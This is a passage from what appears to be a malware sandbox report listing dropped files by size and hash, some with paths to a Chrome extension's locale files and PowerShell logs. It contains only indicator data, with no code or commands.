SHA512512a6a0f5e1059ab8957e54257473b920249f4392666353f97c67637988170ab504225c8f7a06af6055a9248c857a939bf0bb69911d5bfe310d41baa86b1800c
-
Filesize
2KB
MD5207b9d3daeab96c87b50a3af371f7060
SHA1bf0e1427d73a8eebdb5c871a4d631c96705fe95b
SHA2566201e6393b69d6e31173a9a00e21f02387bd1bcfaf5de39f7e2ce369606864d7
SHA512981ef0868291f8822e844d0d23236a21cec8b1252f798d60695e840c4b588cc957c7324b1dccbed5a0f259e4c7998ca7f521ecb1565def9cd0b01db97be3ffef
-
Filesize
2KB
MD5f3b7b09ac5b30f1cf7b199b2f3434900
SHA1a7b7dd335e96dd495b55e05be72592eeb6fc275a
SHA2563806bc34fa59f5c3c9a04fabce5fe9573a0a0351b876733df00c9c98d05cb3de
SHA5127d5189b913abdd9ef39f5ba9e23f9458f53774d1e871be05f4721c5e2853cb89fa5d37bac11e2249f0f1d3429ae7a0ddc880285993f80890e2bce4ab5f32e45a
-
Filesize
2KB
MD5ea8cdf33c6cfc77e7a476f57064310e9
SHA1427f2a41bcbe403fba88333ed2ceaa2596fe911e
SHA256aeedf79e2d1361511cb9b652d15e6dd9664124d37275872ef559595879649d1b
SHA512c449e86ffc9fe2b0a6aaa5a18cab3d04cf93c1aea1b086b5fbd2d08c384da35335043a2e790c004ff617ab8a44431d610b3d728dfa9357733f544856a40cb34b
-
Filesize
1.5MB
MD5d80ec44ae43a0608fa1bc923f69137a4
SHA1fbb2194f304916b2eaa5d4e8a0e159197ececd3a
SHA2562599c95cdced129afabd4145f4e6ea5f04e263bfb9a4ebf306717b0ffe0a7169
SHA5129ee4ad7d996b8d7b2a00f1173aaf8e8dc5f0a174b7283cd4ed5bcc0b0ba5de194cc0556edaf40db9a88bde94ddc0e55239d19ea2a9d1de3b493ed6df5cd3dcd5
-
Filesize
2KB
MD5c47346f677cda45225d5fd5eec065f5c
SHA1150575e8d5ebec49d6bbb00ed5278d9b96295db0
SHA256f7fb7f1470ad274ba99a1f97ae3d5ecacf2246e8a26fc8a8705a4de75c17ec3e
SHA51242de591450a1173c034df80919df762f465208dc92de2d3195966d5c04852f23ebd0bfe15d62296c3ef66345ffd4207ed231bd91f4bd511553642db8dde20f04
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD54905d7d78237239d02eb4439e2bb3c0d
SHA131a6759685b2a0b158464f34880691475ff29db6
SHA256435fd8d19eef699b4564ee7ddbe7716d5bed0cdfb43016370ec06df86fe8a41d
SHA512b5674bfe1afac90aee479c961c8ce3b51fdf4375fc79522dae6000621625de7bbdaa17fa5398a0891d424553e312664f8159b2f1738b18c4f7f7ad9c6f76b727
-
Filesize
3KB
MD5e9b877cbebdba6a332b76a063ac66a1f
SHA1062e17f825bdc8e12c5275b8245c8eac39a16649
SHA2561acc0827438e2d9c893bd886d1982cdb76c9b598b991c16a74289390d4535bcb
SHA512eac7e45742eb6d9b16538adb81f399b4298d9f0c5442bd47d58783920682046abe36c0c8a3f449230c67321eb62154ffe3f26b47bca5c8de3aa4099aa8fe4eb7
-
Filesize
1KB
MD53a2009bb91f08d9da856caa84489ee13
SHA1ce80e2d2396b6b9bf3aea0903bd1b213cacec96b
SHA2568497bbb84197e537f21dd262f11a8b0144614ccc9f1371fe6dcd7d45669ffd2b
SHA5120ee17d4affe546b55941774b254f8801dc44affe1d8be8f3ae2330a31f0d9c826b0506cea9177db3dfa1c42c5f7fc437988a3d7909273397477d9b317acf91f9
-
Filesize
6.1MB
MD52b7903c261c3aed88ecd54227e6dccc7
SHA163259b50b112ed465ae362226aa9cbad1ddfaaa6
SHA256375c59528b64b4100023e2b100b0f1479166b418d3436d9f0fdad5717c8a8946
SHA5128684b1b3a92d1c17c24645c21c2c326c9a60dbeed1faf119545e8b15308a3d81809399eb02eb88395c556f52cb2ad7b6750603c73e43ad363f3358cce48b76f1
-
Filesize
6.1MB
MD52b7903c261c3aed88ecd54227e6dccc7
SHA163259b50b112ed465ae362226aa9cbad1ddfaaa6
SHA256375c59528b64b4100023e2b100b0f1479166b418d3436d9f0fdad5717c8a8946
SHA5128684b1b3a92d1c17c24645c21c2c326c9a60dbeed1faf119545e8b15308a3d81809399eb02eb88395c556f52cb2ad7b6750603c73e43ad363f3358cce48b76f1
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
7KB
MD51ab62b3df94a1f5a465cd4249aa619a8
SHA1bdbf0dc451eb9fa570012d7c08a2dafedf2aa40a
SHA256edf613815c5c32d626f0718a470388529549fca8098697f59ae61cc25aed735e
SHA512fd6c3ee155df4d861978c24c79e555aa053f3bec8e0c44550c3d553b9b242de41cdc1220cc34af62be41c6c98c460245f059a7dd2cd9b2e9711bb3d3faea7e42
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD54b063d312b4c1b411db2bbdb4c44310d
SHA166fd999a9c86e9bb9a4588ceedc83156573fe8ef
SHA2567d58a9a2b9729614bf38e949414d2acabcfab9b6dd5524b147077b163913b1b6
SHA512fd5f8cdc86c358d4860ab9be675d90c811daab45dc48c4f25f32fabc6a6bc60f32b61d16dbaccaf3670454d001f8c3ea19c4da066386424638d999f8b1a60014
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
6.8MB
MD58b5aad9fa387f13517d2eb3099088eb2
SHA126b6edc69c68ad619a74c048dc767b989a8e9efb
SHA256024f1655c2bb89149f6edf5c88d628e82546ae707b5effad684ee32b1c9b0f31
SHA512eb9ef4d3bbfa51605b49fca9b23735ac68ce6cbc4ee1ced98978ef66cc5bf6aed95e788ea2b41c2038d5020cfcc9754ff2530c103f13d34f8d9c33d135ac5d3e
-
Filesize
6.2MB
MD51509aa39c3ceecad0f29be3022b1a070
SHA110104347a9060e5c5ac6681a72b794adbbc1f71e
SHA2568901baff68a17646d0a584cf550e99356c0ce67d2ce430811aa238688c6c9032
SHA512cb54e069e3c8c8383577e80a01337e20910c461abbcd4155b087acb34600dd3a180537299ce4c6e2832a14165da498276857bcbee496b0c58f4cfecc97cd9a71
-
Filesize
6KB
MD59bf14a705ab587337b6e66c2fe370bce
SHA149771b95ce6b637c9093a38da91b512b7b702cb3
SHA256104317e4195d322ab5969a164a49ac68f1082f9d2d5fe38da4a7ce6a1d94316f
SHA512c3d55452f83a90b12c39e4ea998d38ea1a079c1e8c367199fb06fd434fe10732838345d4a52620afebbe92b73bcb392b6948f10d02ec8ecc51fb4daa8566ea8b
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.2MB
MD51509aa39c3ceecad0f29be3022b1a070
SHA110104347a9060e5c5ac6681a72b794adbbc1f71e
SHA2568901baff68a17646d0a584cf550e99356c0ce67d2ce430811aa238688c6c9032
SHA512cb54e069e3c8c8383577e80a01337e20910c461abbcd4155b087acb34600dd3a180537299ce4c6e2832a14165da498276857bcbee496b0c58f4cfecc97cd9a71